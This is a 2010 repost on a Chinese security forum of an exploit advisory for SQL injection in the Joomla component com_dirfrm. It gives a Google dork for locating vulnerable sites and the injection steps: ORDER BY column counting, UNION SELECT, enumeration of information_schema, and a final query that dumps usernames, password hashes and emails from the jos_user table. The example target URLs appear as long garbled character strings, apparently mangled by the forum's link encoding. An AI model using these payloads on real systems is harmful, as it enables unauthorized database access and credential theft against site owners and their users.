首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 峰会 看雪商城 证书查询
  1. 社区
  2. WEB安全
    3. 发新帖
[转帖][推荐]Joomla Component "com_dirfrm" Sql Injection Vulnerability
发表于: 2010-8-18 16:30 2175

[转帖][推荐]Joomla Component "com_dirfrm" Sql Injection Vulnerability

freebsdlin 活跃值
2010-8-18 16:30
2175
Exploit Title : Joomla Component "com_dirfrm" Sql Injection Vulnerability  

# Date : 18 - 8 - 2010  

# Author : Hieuneo (Vietnam)  

# Version : All Versions  

# Tested on : Win 7 Home  

   

###############################################  

Dork google: inurl:"com_dirfrm"  

###############################################  

Exploit:  

0b6K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4A6N6r3g2Q4x3X3g2U0L8$3#2Q4x3V1k6H3j5i4c8Z5i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6G2M7s2c8A6L8$3&6Q4x3@1c8U0L8$3#2Q4y4h3k6V1K9i4u0X3M7X3#2Q4x3U0k6@1j5i4y4C8i4K6y4p5L8r3W2K6N6p5q4D9L8q4)9J5y4X3y4S2N6r3W2V1i4K6y4p5i4K6g2n7f1#2q4x3i4K6t1$3L8X3u0K6M7q4)9K6b7W2)9J5y4X3&6T1M7%4m8Q4x3@1t1`.

Injection]&id=8&Itemid=32  

or  

1b3K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4A6N6r3g2Q4x3X3g2U0L8$3#2Q4x3V1k6H3j5i4c8Z5i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6G2M7s2c8A6L8$3&6Q4x3@1c8U0L8$3#2Q4y4h3k6V1K9i4u0X3M7X3#2Q4x3U0k6@1j5i4y4C8i4K6y4p5L8r3W2K6N6p5q4D9L8q4)9J5y4X3y4S2N6r3W2V1i4K6y4p5x3g2)9J5y4X3W2V1i4K6y4p5i4K6g2n7f1#2q4x3i4K6t1$3L8X3u0K6M7q4)9K6b7W2)9J5y4X3&6T1M7%4m8Q4x3@1t1`.

Injection]&Itemid=32  

###############################################  

[SQL Injection]:  

-> Step1:  

- order by n--- False  

- order by n+1-- True  

   

-> Step2:null  Union select 1,2,3,4,...,n+1--  

Eg: dcaK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4A6N6r3g2Q4x3X3g2U0L8$3#2Q4x3V1k6H3j5i4c8Z5i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6G2M7s2c8A6L8$3&6Q4x3@1c8U0L8$3#2Q4y4h3k6V1K9i4u0X3M7X3#2Q4x3U0k6@1j5i4y4C8i4K6y4p5L8r3W2K6N6p5q4D9L8q4)9J5y4X3y4S2N6r3W2V1i4K6y4p5x3g2)9J5y4X3W2V1i4K6y4p5L8Y4g2D9L8q4)9J5y4X3&6T1M7%4m8Q4x3@1u0Q4x3U0k6F1j5Y4y4H3i4K6y4n7

union select 1,2,3,4,5,6,7,8,9,10--&Itemid=32  

   

-> Step3: replace display number on website  

version(), user(), database  

#if version SQL >=5 : try exploit with table system:  

___table_name from information_scheama.tables where table_schema=database()--  

___column_name form information_schema.columns where table_name=Char(name table)  

#if version SQL <5: try exploit with blind SQL, blind table_name and column_name  

   

-> Step 4: collecting information  

   

null union select 1,2,3,concat_ws(0x7c,username,password,email) from jos_user--  

   

Done!  

#############Hieuneo@VBF################  

--  

Hieuneo

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 0
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回